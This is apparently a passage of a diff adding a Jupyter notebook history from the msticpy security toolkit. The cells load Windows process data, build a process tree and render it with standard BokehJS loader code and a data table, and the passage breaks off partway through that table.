+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mModuleNotFoundError\u001b[0m                       Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-3-415c490de503>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[1;32mimport\u001b[0m \u001b[0mmsticpy\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msectools\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mprocess_tree_utils\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      2\u001b[0m \u001b[1;32mimport\u001b[0m \u001b[0mmsticpy\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mnbtools\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mprocess_tree\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mptplot\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      4\u001b[0m \u001b[0mp_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mtestdf\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mModuleNotFoundError\u001b[0m: No module named 'msticpy.sectools.process_tree_utils'"
+       ]
+      }
+     ],
+     "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6",
+     "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)"
+    },
+    "executionTime": "2019-12-13T19:49:41.311Z"
+   },
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "13545446-6121-4660-83e7-26712f31126a",
+     "hasError": false,
+     "id": "49c5edc4-ca62-4d42-85e3-578a4b9c1872",
+     "outputs": [],
+     "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430",
+     "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")"
+    },
+    "executionTime": "2019-12-13T20:26:03.188Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "ee78bba9-2b9b-4567-9392-985c9b19fb0b",
+     "hasError": false,
+     "id": "8fa864ac-34d2-492c-a5f3-8de85bce1ed3",
+     "outputs": [],
+     "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76",
+     "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")"
+    },
+    "executionTime": "2019-12-13T20:26:08.534Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "f0d41ca3-be7c-4d5d-92b5-b4aca2613c79",
+     "hasError": false,
+     "id": "70acc446-d177-488d-a4e5-153697303b3a",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "c8adaea0e82d4ae48eec39e0f9e0a986",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n"
+      }
+     ],
+     "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6",
+     "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)"
+    },
+    "executionTime": "2019-12-13T20:26:16.580Z"
+   },
+   {
+    "cell": {
+     "executionCount": 4,
+     "executionEventId": "554f1b97-5220-4399-bbd7-c1da5258d423",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\n    <div class=\"bk-root\">\n        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n        <span id=\"1001\">Loading BokehJS ...</span>\n    </div>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };var element = document.getElementById(\"1001\");\n  if (element == null) {\n    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n    return false;\n  }\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.4.0.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+        "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };var element = document.getElementById(\"1001\");\n  if (element == null) {\n    console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n    return false;\n  }\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.4.0.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\n\n\n\n\n\n  <div class=\"bk-root\" id=\"81fddc03-103b-4116-8b3d-8c51c88e70df\" data-root-id=\"1132\"></div>\n"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"5635a785-c54a-48f1-a6d1-7fb099a1d973\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1131\",\"type\":\"Row\"},{\"id\":\"1129\",\"type\":\"DataTable\"}]},\"id\":\"1132\",\"type\":\"Column\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\",\"type\":\"Dodge\"}}},\"id\":\"1060\",\"type\":\"Text\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"lightgrey\"},\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[4,4],\"line_width\":{\"value\":2},\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1165\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1163\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\",\"type\":\"Dodge\"}}},\"id\":\"1059\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1138\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1057\",\"type\":\"Dodge\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1055\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1161\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1052\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1053\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1055\",\"type\":\"CDSView\"}},\"id\":\"1054\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1136\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.8},\"id\":\"1063\",\"type\":\"Dodge\"},{\"attributes\":{\"items\":[{\"id\":\"1048\",\"type\":\"LegendItem\"}],\"title\":\"Exe\"},\"id\":\"1047\",\"type\":\"Legend\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\",\"type\":\"Dodge\"}}},\"id\":\"1052\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null,\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"W